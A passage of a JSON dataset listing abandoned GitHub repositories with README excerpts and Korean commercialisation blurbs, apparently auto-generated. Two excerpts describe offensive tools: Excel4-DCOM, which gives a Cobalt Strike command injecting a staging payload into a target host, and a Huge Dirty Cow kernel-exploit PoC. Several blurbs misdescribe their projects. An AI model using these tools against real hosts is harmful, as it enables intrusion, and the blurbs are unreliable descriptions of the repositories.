역사적 자료입니다.\n\n## 어디에 쓸 수 있나\n- **컨퍼런스 아카이브 SaaS**: 과거 개발자 컨퍼런스 데이터를 보관·검색하는 구독 서비스로 운영\n- **오픈소스 역사 데","readme_excerpt":"Site for 2012.fossasia.org Summit\n\nhttps://2012.fossasia.org\n","composite_score":0.3032,"license_safety_tag":"unknown"},{"name":"MQZHot/ZLaunchAdVC","github_url":"https://github.com/MQZHot/ZLaunchAdVC","stars":13,"language":"Swift","license":"mit","abandonment_months":80,"description":"# ZLaunchAdVC 저장소 분석\n\n## 왜 보물인가\n앱을 출시할 때 필요한 광고 기술을 빠르게 적용할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발사의 SaaS**: 앱 개발자들이 구독으로 광고 시스템을 빌려 쓰는 서비스\n2. **내부 업무 도구**: 광고 에이전시가 자신의 클라이언트 앱에 광고를 빠르게 삽입하는 업","readme_excerpt":"\n## ZLaunchAd\n\n ![image](https://img.shields.io/badge/support-iOS%208%2B-blue.svg)   ![image](https://img.shields.io/cocoapods/v/ZLaunchAd.svg?style=flat)    [![Carthage Compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n![image](https://img.shields.io/badge/SPM-supported-DE5C43.svg?style=flat)\nZLaunchAd集成启动广告，支持`LaunchImage`和`LaunchScreen`，支持GIF，支持本地图片，支持视图过渡动画\n\n\n![image](https://github.com/MQZHot/ZLaunchAd/raw/master/Picture/pic0.gif) ![image](https://github.com/MQZHot/ZLaunchAd/raw/master/Picture/pic2.gif) ![image](https://github.com/MQZHot/ZLaunchAd/raw/master/Picture/pic3.gif) ![image](https://github.com/MQZHot/ZLaunchAd/raw/master/Picture/pic4.gif) ![image](https://github.com/MQZHot/ZLaunchAd/raw/master/Picture/pic5.gif) ![image](https://github.com/MQZHot/ZLaunchAd/raw/master/Picture/pic6.gif)\n\n### 功能\n- [x] 支持进入前台广告显示，设定时间间隔，进入后台后返回的时间大于间隔才进行显示\n- [x] 接收自定义通知控制图片显示\n- [x] 支持Objective-C/Swift\n- [x] 自带图片缓存，清除缓存\n-","composite_score":0.3031,"license_safety_tag":"safe"},{"name":"ostera/tldr.jsx","github_url":"https://github.com/ostera/tldr.jsx","stars":6,"language":"JavaScript","license":"mit","abandonment_months":64,"description":"# tldr.jsx 프로젝트 분석\n\n## 왜 보물인가\n웹사이트의 긴 문서를 자동으로 요약해주는 도구로, 바쁜 사람들이 핵심만 빠르게 파악할 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 뉴스 구독 앱에서 기사를 자동 요약하여 구독자에게 빠른 뉴스 업데이트 제공\n- **내부 업무 도구**: 기업의 장문 보고서나 이메일을 자동으로","readme_excerpt":"# tldr.jsx [![Travis-CI](https://api.travis-ci.org/ostera/tldr.jsx.svg)](https://travis-ci.org/ostera/tldr.jsx) \n📚 A Reactive web client for [tldr-pages](https://github.com/tldr-pages/tldr). Try it [here](https://tldr.ostera.io).\n\nIf you've found this project useful, you can now [support me on Patreon](https://patreon.com/abstractmachines)\n\n <a href=\"https://www.patreon.com/AbstractMachines\" >\n    <img alt=\"Become a Patron\" src=\"https://c5.patreon.com/external/logo/become_a_patron_button.png\"  />\n  </a>\n\n## Featuring\n\n* `Unique URIs`, to easily share any `tldr-page`!\n* `Mobile-first-ish`, to take with you anywhere!\n* Fully Reactive, embracing `ES6`, `RxJS`, `FlowType` and `React` for great win!\n\n![tldr.ostera.io on desktop and mobile views](https://s3.amazonaws.com/tldr.ostera.io/screenshot.jpg)\n\n## Roadmap\n\nAs [tldr-pages](https://github.com/tldr-pages/tldr) advances, new features can be planned. Some are:\n\n* `Autocompletion`, freeing you from remembering all those command names\n* `Se","composite_score":0.3031,"license_safety_tag":"safe"},{"name":"choojs/bankai","github_url":"https://github.com/choojs/bankai","stars":6,"language":"JavaScript","license":"apache-2.0","abandonment_months":49,"description":"# Bankai 저장소 분석\n\n## 왜 보물인가\n웹사이트를 빠르고 효율적으로 만들 수 있도록 도와주는 개발자 도구로, 복잡한 설정 없이 간단하게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **스타트업 웹사이트 구축 SaaS**: 비개발자도 빠르게 웹사이트를 만들 수 있는 플랫폼으로 월 구독료 모델 운영\n- **웹 에이전시 내부 도구**: 디자이너와","readme_excerpt":"# bankai\n[![npm version][2]][3] [![build status][4]][5]\n[![downloads][8]][9] [![js-standard-style][10]][11]\n\nThe easiest way to compile JavaScript, HTML and CSS.\n\nWe want people to have fun building things for the web. There should be no\nhurdles between a great idea, and your first prototype. And once you're ready,\nit should be easy to package it up and share it online. That's Bankai: a tool\nthat helps you build for the web. No configuration, and no hassle - that's our\npromise.\n\nIf this is your first time building something for the web, take a look at\n[choojs/create-choo-app](https://github.com/choojs/create-choo-app) to help get\na project setup from scratch :sparkles:.\n\n## Usage\n```txt\n  $ bankai <command> [entry] [options]\n\n  Commands:\n\n    build       compile all files to dist/\n    inspect     inspect the bundle dependencies\n    start       start a development server\n\n  Options:\n\n    -d, --debug       output lots of logs\n    -h, --help        print usage\n    -q, --quiet       don't ","composite_score":0.3031,"license_safety_tag":"safe"},{"name":"outflanknl/Excel4-DCOM","github_url":"https://github.com/outflanknl/Excel4-DCOM","stars":9,"language":"PowerShell","license":"unknown","abandonment_months":87,"description":"","readme_excerpt":"# Excel4-DCOM\nPowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe).\n\n## Technology\nLast year, after our presentation at DerbyCon, we released a blog post detailing the abuse of Excel 4.0 macros (also called XLM macros). This is a macro language which is completely different from VBA and which has been embedded within Excel since 1992. The original blog can be found here, which includes a process injection sample: https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/\n\nIt turns out that Excel 4.0 macros are also exposed to DCOM via the ExecuteExcel4Macro method. We modified our process injection XLM macro sample to work on remote hosts as well via DCOM and we hereby release it in PowerShell and Cobalt Strike script versions.\n\n## Usage\n**Cobalt Strike version**\n\n`Excel4-DCOM <targethost> <listener>`\n\nThis will inject a x86 staging payload into excel.exe on the target host. Make sure to","composite_score":0.303,"license_safety_tag":"unknown"},{"name":"iwannabetop/Awesome-Android-Learning-Guide","github_url":"https://github.com/iwannabetop/Awesome-Android-Learning-Guide","stars":7,"language":"","license":"unknown","abandonment_months":86,"description":"# Awesome-Android-Learning-Guide 분석\n\n## 왜 보물인가\n스마트폰 앱을 만들고 싶은 사람들이 어디서부터 공부해야 할지 알려주는 학습 가이드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 안드로이드 앱 개발 학습자를 위한 체계적인 커리큘럼 제공 서비스\n2. **기업 교육 프로그램**: IT 회사의 신입 개","readme_excerpt":"\n![](https://avatars3.githubusercontent.com/u/32798425?s=400&u=e2ad1a5a21fc71ff2f8511866395beca599656f9&v=4)\n\n# Awesome-Android-Learning-Guide\n\n努力打造一份系统、全面的安卓开发者进阶指南\n\n# 介绍\n\n你是否有这样的经历：\n\n- 面试被问到基础、细节时，无法说的明明白白\n- 看源码时看的头晕脑胀，不知所云\n- 想深入学习安卓不知从何看起\n- 缺乏完整的学习路线\n- 想补基础不知道需要补什么\n\n如果有其中一条符合你，恭喜你，来对地方了！\n\n《安卓进阶学习指南》是 12 个小伙伴一起编写的学习路线，其中有工作多年觉得基础不扎实的，也有刚入门迷茫不知方向的，我们聚集在一起，希望在探索方向、查漏补缺的过程同时，可以为更多安卓开发者提供帮助。\n\n\n- 如果你觉得有帮助或者感兴趣，欢迎 **star**。\n- 本项目长期更新，欢迎 **watch**。\n\n\n## 与市面上的面试经验有何不同\n\n你可能看到很多市面上的面试知识点，觉得这不过是又一个。\n\n错！错！错！\n\n我们做这个的目的是扎实自己的基础，建立知识点的体系，同时对平时的开发更深一步思考，比面经内容更广、知识点研究更深。\n\n换句话说，就是 **“更踏实，没那么功利”**。\n\n这是我们的初衷，也是努力的方向，如有不符，欢迎拍砖！\n\n \n# 内容\n\n\n- [计算机组成原理]\n- [网络协议]\n- [Linux 操作系统]\n- [Java 部分](java/README.md) （部分文章未完成编辑，需要多努力）\n- [数据结构与算法](datastruct/README.md) （分工完成、即将开始学习）\n- 并发编程(内容构思中，欢迎补充）\n- 网络编程\n- Java 虚拟机\n- 设计模式\n- 待定\n\n# 贡献者\n\n根据贡献内容数量排名：\n\n\n| 排名 | 昵称 | 介绍 |文章数量 | 审核数量 | 最近活跃时间 |\n| --- | --- | --- | --- |--- | --- |\n| 1 | [shixinzhang](https://github.com/shixinzhang) | 努力变更强 | 1 | 5 | 2018/04/06 |\n| 2 | [wustor","composite_score":0.303,"license_safety_tag":"unknown"},{"name":"true1023/Crazy-Python","github_url":"https://github.com/true1023/Crazy-Python","stars":9,"language":"Python","license":"WTFPL","abandonment_months":74,"description":"# Crazy-Python 저장소 분석\n\n## 왜 보물인가\nPython 프로그래밍을 배우는 초보자들이 쉽게 따라할 수 있는 실용적인 예제 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 초급 프로그래밍 강좌의 실습 자료로 제공하는 구독형 서비스\n2. **기업 직원 교육**: IT 비전공자 직원들의 업무 자동화 스킬 학습용 내부 도구","readme_excerpt":"<p align=\"center\"><img src=\"./assets/logo.png\" alt=\"\"></p>\n\n<h1 align=\"center\">疯狂的Python! 🐍</h1>\n<p align=\"center\">一些有趣的鲜为人知的Python特性集合.</p>\n\n[![WTFPL](https://img.shields.io/badge/License-WTFPL%202.0-lightgrey.svg?style=flat-square)](http://www.wtfpl.net/)\n[![Join the chat at https://gitter.im/Crazy-Python/Lobby](https://badges.gitter.im/Crazy-Python/Lobby.svg)](https://gitter.im/Crazy-Python/Lobby?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n\n*本文翻译自[What the f*ck Python!](https://github.com/satwikkansal/wtfpython)*\n\n---\n\nPython作为一个设计优美的交互式脚本语言，提供了许多人性化的语法。但是也因为这个原因，有些Python的代码片段并不会按照用户想象的那样运行。\n\n这篇文章就让我们总结一下那些Python里反直觉的代码片段，并且深入研究一下其中的运行原理。\n\n下面的某些例子可能并不像是标题说的那样....嗯....反直觉，但是它们依旧会带你揭示一些你从来没有意识到的Python语言特性。\n\n而且，我发现这也是一种很好的学习编程语言的方法，不过前提是你不要认为这篇文章会告诉你一切，抛砖引玉而已。相信我，你需要的知识都隐藏在互联网的某个角落里。\n\n如果你已经写了很久的Python代码，你可以把下面的这些例子当做一个挑战，试一试自己能不能在第一次就猜对结果。也许某些例子里的坑你已经遇到过并且解决了，那么再次看见这个坑的时候我想你会为当时自己的努力而自豪的。:sweat_smile:\n\n好了，下面是正文！\n\n<h1>目录</h1>\n<!-- TOC depthFrom:1 depthTo:","composite_score":0.303,"license_safety_tag":"safe"},{"name":"KalleHallden/BlackFridayScrape","github_url":"https://github.com/KalleHallden/BlackFridayScrape","stars":10,"language":"Python","license":"unknown","abandonment_months":67,"description":"","readme_excerpt":"","composite_score":0.303,"license_safety_tag":"unknown"},{"name":"developerHaoz/WatermelonDiaryNew","github_url":"https://github.com/developerHaoz/WatermelonDiaryNew","stars":7,"language":"Java","license":"unknown","abandonment_months":96,"description":"# WatermelonDiaryNew 상업화 분석\n\n## 왜 보물인가\n간단한 일기장 앱이지만, 사용자의 일상을 기록하고 관리하는 니즈는 영원하므로 지속적인 수익화 기회가 있습니다.\n\n## 어디에 쓸 수 있나\n- **감정 관리 SaaS**: 일일 일기 기록으로 사용자의 감정 패턴을 분석해주는 구독 서비스\n- **기업 내부 도구**: 팀원들의 업무 일지를 자동","readme_excerpt":"### 前言\n> 本文的内容主要是解析日记 APP 的制作流程，以及代码的具体实现，若有什么不足之处，还请提出建议，附上这个 APP 的 Github 地址 [WatermelonDiaryNew](https://github.com/developerHaoz/WatermelonDiaryNew) 欢迎大家 star 和 fork.\n\n#### 本文的主要内容\n- 日记的展示\n- 悬浮菜单的实现\n- 日记增删改的实现\n\n先来一波日记的展示吧，虽然内容比较简单，但还是设计的非常用心的，因此这款 APP 还是非常简洁和优雅的\n\n![DiaryLICE.gif](http://upload-images.jianshu.io/upload_images/4334738-2844d5478c509396.gif?imageMogr2/auto-orient/strip)\n\n## 一、日记的展示\n#### 1、伪日记的处理\n可以看到刚开始进入主页面，显示的是 `今天，你什么都没写下...` 这个伪日记，其实只要是某一天没有写日记的话，界面最上面显示的就是这个，当我们写了日记之后，这个伪日记便会消失，讲道理一开始实现这个还真花了我不少心思，本来的思路是将这个伪日记作为 RecyclerView 的第一个Item，如果当天有写日记了，就将它隐藏起来，等到了第二天再重新显示，但是感觉实现起来会很麻烦，后来想了想只要将这个伪日记，直接写在主页面的布局中，到时候如果检索到数据库里面，有某篇日记的日期跟当天的日期一致的话，就将伪日记从布局中 remove 掉就行了\n```\n if (cursor.moveToFirst()) {\n            do {\n                String date = cursor.getString(cursor.getColumnIndex(\"date\"));\n                // 这是我自己写的一个获取当天日期的一个方法\n                String dateSystem = GetDate.getDate().toString();\n                if (date.equals(dateSystem)) {\n                    mMainLlMain.","composite_score":0.3029,"license_safety_tag":"unknown"},{"name":"xiaozhouwang/kaggle-porto-seguro","github_url":"https://github.com/xiaozhouwang/kaggle-porto-seguro","stars":12,"language":"Python","license":"unknown","abandonment_months":85,"description":"# Porto Seguro 보험 위험도 예측 모델 분석\n\n## 왜 보물인가\n보험사가 고객의 사고 위험도를 미리 예측하는 인공지능 모델로, 보험료 책정과 고객 심사를 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보험사 SaaS 서비스**: 신청자의 사고 확률을 실시간으로 계산해 보험료를 자동으로 책정하는 온라인 플랫폼\n2. **은행/금융 내부 ","readme_excerpt":"### Requirements\n\n*older or newer version of below packages should theoretically work fine*\n\npython 2.7\n\nnumpy 1.13.3\n\npandas 0.20.3\n\nsklearn 0.19.1\n\nkeras 2.1.1\n\ntensorflow 1.4.0\n\nxgboost 0.6\n\nlightgbm 2.0.10\n\n\n### How to reproduce\n\n#### Simple solution (recommended)\nPut unzipped data in `input`\n\n*Generate a simple solution that is good enough for 2nd place (~0.2938 on private LB)*\n\n`cd code`\n\n`python fea_eng0.py`\n\n`python nn_model290.py` to get a nn model that scores 0.290X\n\n`python gbm_model291.py` to get a gbm model that scores 0.291X\n\n`python simple_average.py` and then you can find the submission file at `../model/simple_average.csv`\n\nYou can reproduce this solution in a few hours.\n\n#### Exact solution (Optional)\n\nAlthough not recommended but you can also reproduce the exact same solution we submitted (0.29413 on private LB).\n\n*you can follow these steps below, in addition to the simple solution*\n\n```\ncd ../code_for_exact_solution/\npython keras3.py\npython keras6.py\npython keras7.","composite_score":0.3029,"license_safety_tag":"unknown"},{"name":"yuanming-hu/taichi","github_url":"https://github.com/yuanming-hu/taichi","stars":5,"language":"C++","license":"apache-2.0","abandonment_months":33,"description":"# Taichi 저장소 분석\n\n## 왜 보물인가\n복잡한 물리 시뮬레이션과 그래픽 처리를 일반 컴퓨터에서도 빠르게 실행할 수 있게 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **3D 게임/영상 제작 SaaS**: 소규모 스튜디오도 고급 그래픽 렌더링을 구독료로 이용할 수 있는 클라우드 서비스\n2. **건축/엔지니어링 시뮬레이션 API**: 건축가나 ","readme_excerpt":"<div align=\"center\">\n  <img width=\"500px\" src=\"https://github.com/taichi-dev/taichi/raw/master/misc/logo.png\"/>\n</div>\n\n---\n[![Latest Release](https://img.shields.io/github/v/release/taichi-dev/taichi?color=blue&label=Latest%20Release)](https://github.com/taichi-dev/taichi/releases/latest)\n[![downloads](https://pepy.tech/badge/taichi)](https://pepy.tech/project/taichi)\n[![CI](https://github.com/taichi-dev/taichi/actions/workflows/testing.yml/badge.svg)](https://github.com/taichi-dev/taichi/actions/workflows/testing.yml)\n[![Nightly Release](https://github.com/taichi-dev/taichi/actions/workflows/release.yml/badge.svg)](https://github.com/taichi-dev/taichi/actions/workflows/release.yml)\n<a href=\"https://discord.gg/f25GRdXRfg\"><img alt=\"discord invitation link\" src=\"https://dcbadge.vercel.app/api/server/f25GRdXRfg?style=flat\"></a>\n\n```shell\npip install taichi  # Install Taichi Lang\nti gallery          # Launch demo gallery\n```\n\n## What is Taichi Lang?\n\nTaichi Lang is an open-source, impera","composite_score":0.3029,"license_safety_tag":"safe"},{"name":"clearcontainers/runtime","github_url":"https://github.com/clearcontainers/runtime","stars":5,"language":"Go","license":"apache-2.0","abandonment_months":87,"description":"# clearcontainers/runtime 분석 보고서\n\n## 왜 보물인가\n컴퓨터의 작은 독립 공간을 만들어 여러 프로그램을 안전하게 동시에 실행할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 서비스 업체의 SaaS**\n고객들이 자신의 코드를 안전하게 실행할 수 있는 온라인 플랫폼 운영 (예: 코드 실행 교육 플랫폼)\n\n**","readme_excerpt":"# Project no longer maintened\n\n> **WARNING:**\n>\n> This project is **no longer maintained**.\n>\n> All users are encouraged to migrate to\n> [Kata Containers](https://katacontainers.io).\n>\n> See the\n> [Kata Containers](https://github.com/kata-containers) project\n> [installation documentation](https://github.com/kata-containers/documentation/tree/master/install)\n> for further details.\n\nTo see the old Clear Containers `README`, click [here](README-original.md).\n","composite_score":0.3029,"license_safety_tag":"safe"},{"name":"fossasia/open-event-ios","github_url":"https://github.com/fossasia/open-event-ios","stars":11,"language":"Swift","license":"NOASSERTION","abandonment_months":77,"description":"# fossasia/open-event-ios 보물 발굴 보고서\n\n## 왜 보물인가\n행사나 컨퍼런스 참석자들이 자신의 스마트폰에서 프로그램을 보고 일정을 관리할 수 있는 앱을 만드는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 행사 관리 플랫폼 (SaaS)**\n- 기업 컨퍼런스, 음악제, 스포츠 대회 등의 주최자가 참석자용 앱을 자동으로 생성하는","readme_excerpt":"| **CircleCI** | **Code Quality** | **Chat** |\n|--------------|------------------|----------|\n| [![CircleCI](https://circleci.com/gh/fossasia/open-event-ios.svg?style=svg)](https://circleci.com/gh/fossasia/open-event-ios) | [![Codacy Badge](https://api.codacy.com/project/badge/Grade/4faa165463a44fffbd23f319d78a26ea)](https://www.codacy.com/app/mb/open-event-ios?utm_source=github.com&utm_medium=referral&utm_content=fossasia/open-event-ios&utm_campaign=badger) | [![Join the chat at gitter](https://badges.gitter.im/fossasia/https://github.com/fossasia/open-event-ios.svg)](https://gitter.im/fossasia/https://github.com/fossasia/open-event-ios?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) |\n# Open Event iOS\n**iOS** app for **Open Event**\n![Open Event](https://storage.googleapis.com/eventyay.com/assets/branding/base_branding.png)\n\n## Introduction\n> This is an iOS app developed for `FOSSASIA` in mind. The Open Event Project offers event managers a platform to organ","composite_score":0.3029,"license_safety_tag":"unknown"},{"name":"wtsxDev/Raspberry-Pi","github_url":"https://github.com/wtsxDev/Raspberry-Pi","stars":15,"language":"","license":"unknown","abandonment_months":61,"description":"# Raspberry-Pi 저장소 분석\n\n## 왜 보물인가\n라즈베리파이(작은 컴퓨터)를 활용한 실용적인 프로젝트 모음으로, 일반인도 저렴하게 스마트홈이나 자동화 시스템을 직접 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 라즈베리파이 사용자를 위한 원격 모니터링·제어 웹 대시보드 구독 서비스\n2. **내부 업무 도구**:","readme_excerpt":"# Raspberry-Pi\nRaspberry Pi A to Z List\n**Basics Raspberry Pi**\nThe Raspberry Pi was originally designed for educational purposes to use in schools and universities, and to make class and study more interesting.\nUnfortunately, the practical use of the Raspberry Pi or a comparable single-board computer in Germany, Austria and Switzerland is still in its infancy. Listening to the topic, you will find only a few examples showing the use of the Raspberry Pi in school, in education or in study.\nThe following tasks and exercises should help a little here. They are suitable for self-study or as a source for teachers and faculty to build their own Raspberry Pi workshop. The tasks also include exemplary ready-made solutions.\n\n**Raspberry-Pi models**\n\n*   [Raspberry Pi models ](https://kalitut.com/raspberry-pi-models/)\n*   [Raspberry Pi 2 Model B](https://kalitut.com/raspberry-pi-2-model-b/)\n*   [Raspberry Pi 3 Model B](https://kalitut.com/raspberry-pi-3-model-b/)\n\n**Basics**\n\n*   [Raspberry Pi:","composite_score":0.3029,"license_safety_tag":"unknown"},{"name":"stackery/php-lambda-layer","github_url":"https://github.com/stackery/php-lambda-layer","stars":7,"language":"PHP","license":"NOASSERTION","abandonment_months":78,"description":"# stackery/php-lambda-layer 분석 보고서\n\n## 왜 보물인가\n웹사이트를 운영할 때 필요한 프로그램 코드를 클라우드에서 간단하게 실행할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용량에 따라 자동으로 비용을 계산하는 웹 기반 서비스 (예: 파일 변환, 이메일 발송 서비스)\n2. **내부 업무 ","readme_excerpt":"# PHP Layer For AWS Lambda\n\nEver wanted to run PHP websites in AWS Lambda? It's your lucky day! This Lambda Runtime Layer runs the [PHP 7.3/7.1  webserver](http://php.net/manual/en/features.commandline.webserver.php) in response to [AWS API Gateway](https://aws.amazon.com/api-gateway/) or [AWS Application Load Balancer](https://aws.amazon.com/elasticloadbalancing/features/#Details_for_Elastic_Load_Balancing_Products) requests.\n\nAnd, if you're looking for a great way to build serverless apps of all kinds, be sure to check out [Stackery](https://stackery.io)!\n\nThis is an early iteration of the PHP runtime Layer which is not yet ready for production. Please feel free to use this Layer to learn about the Lambda Layers feature and begin experimenting with PHP functions. We welcome feedback and stay tuned for the production-ready version coming soon.\n\n## Current Layer Version ARN\nWhen creating/updating a Lambda function you must specify  a specific version of the layer. This readme will be k","composite_score":0.3028,"license_safety_tag":"unknown"},{"name":"robertoardila/support-unity-memoryprofiler","github_url":"https://github.com/robertoardila/support-unity-memoryprofiler","stars":5,"language":"C#","license":"unknown","abandonment_months":98,"description":"# robertoardila/support-unity-memoryprofiler 분석\n\n## 왜 보물인가\n게임 개발에서 프로그램이 차지하는 메모리 공간을 분석하고 최적화하는 데 도움을 주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발사의 내부 업무 도구**: 게임 성능 최적화 과정에서 메모리 사용량을 모니터링하고 개선하는 데 활용\n2","readme_excerpt":"# Unity Support Colombia: Memory Profiler Extension\nExtension for the existing Unity memory profiler project, this is a WIP project made by the Unity Support Team in Colombia, which uses as a base the Memory Profiler project found in https://bitbucket.org/Unity-Technologies/memoryprofiler and uses the new memory profiler API introduced in Unity5.3a4, adding filters and search options with a node viewer for the objects and their references.\n\nIn order to use it, copy the files in your project, then you will see a new Editor menu called: Support Memory Tools from which you can take,load, save and analyze memory snapshots\n\n* Requires Unity 5.6 or newer in order to use the filters and table views\n* For checking the Heap Memory Information and also for export objects list data to external .csv files (for example the list of all managed or native Objects) you could use any version of Unity that supports the API: (e.g 5.3,5.4,5.5,5.6,2017) \n* Requires a IL2CPP build\n* It uses the same snapshot","composite_score":0.3028,"license_safety_tag":"unknown"},{"name":"Spandan-Madan/Me_Bot","github_url":"https://github.com/Spandan-Madan/Me_Bot","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":69,"description":"# Me_Bot 저장소 분석\n\n## 왜 보물인가\n사용자가 직접 자신의 개인 AI 어시스턴트를 만들고 커스터마이징할 수 있는 오픈소스 프레임워크입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업들이 자신의 브랜드에 맞게 개인화된 챗봇 서비스를 고객에게 제공할 수 있습니다.\n2. **내부 업무 도구**: 회사의 직원들이 자신의 일정 관리,","readme_excerpt":"# Me_Bot\nA simple tool to make a bot that speaks like you, simply learning from your WhatsApp Chats.\n\nInstructions:-\n\n1. From WhatsApp on your phone, go to any chat and export it by going into the settings. Move the txt file that you receive inside the Me_Bot folder.\n\n2. Run the clean_whatsapp_chats.py script using the command. Before running, change the names of the people by changing YOUR_NAME and OTHER_NAME in the scripts according to the txt file you have for your chats.\n\n`python clean_whatsapp_chats.py whatsapp_chat.txt`\n\n3. Run the prepare_files.ipynb ipython notebook.\n\n4. Run the Me_Bot.ipynb file and you can play with the bot at the bottom!\n\nNOTE - Actively seeking collaborators for fun side projects like this. If you're itnerested, please drop me a mail at smadan@mit.edu\n\n## For wechat user:\nWechat chat history is save in SQLite Database, therefore you need to export from you Phone.\nBasically, if you have a iPhone, there are the steps to get the database file:\n1. Use iTunes to","composite_score":0.3028,"license_safety_tag":"unknown"},{"name":"bindecy/HugeDirtyCowPOC","github_url":"https://github.com/bindecy/HugeDirtyCowPOC","stars":41,"language":"C","license":"unknown","abandonment_months":103,"description":"# HugeDirtyCowPOC 분석\n\n## 왜 보물인가\nLinux 운영체제의 심각한 보안 결함을 입증하는 코드로, 기업들의 시스템 보안 문제를 드러내고 개선하도록 강제할 수 있는 중요한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 진단 서비스**: 기업의 Linux 서버가 이 보안 결함에 취약한지 자동으로 검사하고 보고서 제공\n2. **클라","readme_excerpt":"# \"Huge Dirty Cow\" POC\n\nA POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405). Full details can be found [here](https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0).\n\nBefore running, make sure to set transparent huge pages to \"always\":\n```\necho always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled\n```\n\n\n\n","composite_score":0.3028,"license_safety_tag":"unknown"},{"name":"rapidjs/rapid.js","github_url":"https://github.com/rapidjs/rapid.js","stars":70,"language":"JavaScript","license":"unknown","abandonment_months":42,"description":"# Rapid.js 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션을 빠르게 만들 수 있는 개발 도구로, 개발자의 작업 시간을 획기적으로 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 저코드(Low-Code) 플랫폼으로 제공하여 비개발자도 웹 앱을 만들 수 있게 함\n- **내부 업무 도구**: 기업의 IT팀이 빠르게 업무용 ","readme_excerpt":"<p align=\"center\">\n<img src=\"https://rapidjs.io/images/rapid-logo-gh-readme.png\" />\n</p>\n\n[![npm](https://img.shields.io/npm/v/rapid.js.svg?style=flat-square)](https://www.npmjs.com/package/rapid.js)\n[![npm](https://img.shields.io/npm/dt/rapid.js.svg?style=flat-square)](https://www.npmjs.com/package/rapid.js)\n[![npm](https://img.shields.io/travis/rapidjs/rapid.js.svg?branch=master&style=flat-square)](https://www.npmjs.com/package/rapid.js)\n\n##### An ORM-like Interface and a Router For Your API Requests\n###### Create simple, reusable, and cleaner wrappers, define custom routes, and more for your API requests.\n\nRead the official docs at [https://rapidjs.io](https://rapidjs.io).\n\n## Installation\n\nPick your poison:\n\n```\nyarn add rapid.js\nnpm i -S rapid.js\nnpm install --save rapid.js\n```\n\n## Overview\n - [Define Simple Models](#define-simple-models)\n - [Easily Customize Your API Requests](#easily-customize-your-api-requests)\n - [Create Reusable Base Models](#create-reusable-base-models)\n - [","composite_score":0.3028,"license_safety_tag":"unknown"},{"name":"filamentgroup/glyphhanger","github_url":"https://github.com/filamentgroup/glyphhanger","stars":29,"language":"JavaScript","license":"mit","abandonment_months":60,"description":"# Glyphhanger 분석 보고서\n\n## 왜 보물인가\n웹사이트에 사용된 폰트에서 실제로 필요한 글자만 추출해 파일 크기를 줄이는 도구로, 웹사이트 속도 개선에 직접적인 도움을 줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 웹사이트 최적화 도구**: 사용자가 자신의 웹사이트 URL을 입력하면 자동으로 불필요한 글자를 제거해주는 온라인 서비스\n2. ","readme_excerpt":"# glyphhanger\n\n🚛 This project has moved to https://github.com/zachleat/glyphhanger 🚛\n\nYour web font utility belt. It can subset web fonts. It can show you what unicode-ranges are used on a web site (optionally per font-family). It can also subset web fonts automatically using the unicode-ranges it found. It makes julienne fries.\n\n## Installation\n\nAvailable on [npm](https://www.npmjs.com/package/glyphhanger).\n\n```sh\nnpm install -g glyphhanger\n```\n","composite_score":0.3027,"license_safety_tag":"safe"},{"name":"learnapollo/learnapollo","github_url":"https://github.com/learnapollo/learnapollo","stars":7,"language":"TypeScript","license":"mit","abandonment_months":96,"description":"# learnapollo 상업화 분석\n\n## 왜 보물인가\n개발자들이 현대적인 웹 개발 기술을 재미있게 배울 수 있는 실습 교육 플랫폼으로, 기술 교육 시장의 지속적인 수요를 충족할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 SaaS**: 월 구독제 온라인 강의 플랫폼으로 개발자 대상 유료 교육 서비스 운영\n2. **기업 직무 교육**:","readme_excerpt":"# Learn Apollo\n\n![](https://learnapollo.org/images/twitter.png)\n\nSource code for [Learn Apollo](https://learnapollo.com)\n\n## Contribution\n\nIf you have a suggestion on how to improve Learn Apollo please either\n[open an issue](https://github.com/learnapollo/learnapollo/issues/new) or create a pull request by changing the source\nfiles in [`content`](https://github.com/learnapollo/learnapollo/tree/master/content).\n\n```\ncontent/\n├── excursions\n│   ├── excursion-01.md\n│   └── excursion-02.md\n├── go-further\n│   └── wrap-up.md\n├── images\n│   ├── ...\n├── introduction\n│   ├── get-started-bottom.md\n│   └── get-started.md\n├── tutorial-angular\n│   └── angular-playground.md\n├── tutorial-ios\n│   ├── ios-01.md\n│   ├── ios-02.md\n│   ├── ios-03.md\n│   ├── ios-04.md\n│   ├── ios-05.md\n│   └── ios-06.md\n├── tutorial-react\n│   ├── react-01.md\n│   ├── react-02.md\n│   ├── react-03.md\n│   ├── react-04.md\n│   ├── react-05.md\n│   ├── react-06.md\n│   └── react-07.md\n├── tutorial-react-native\n│   ├── 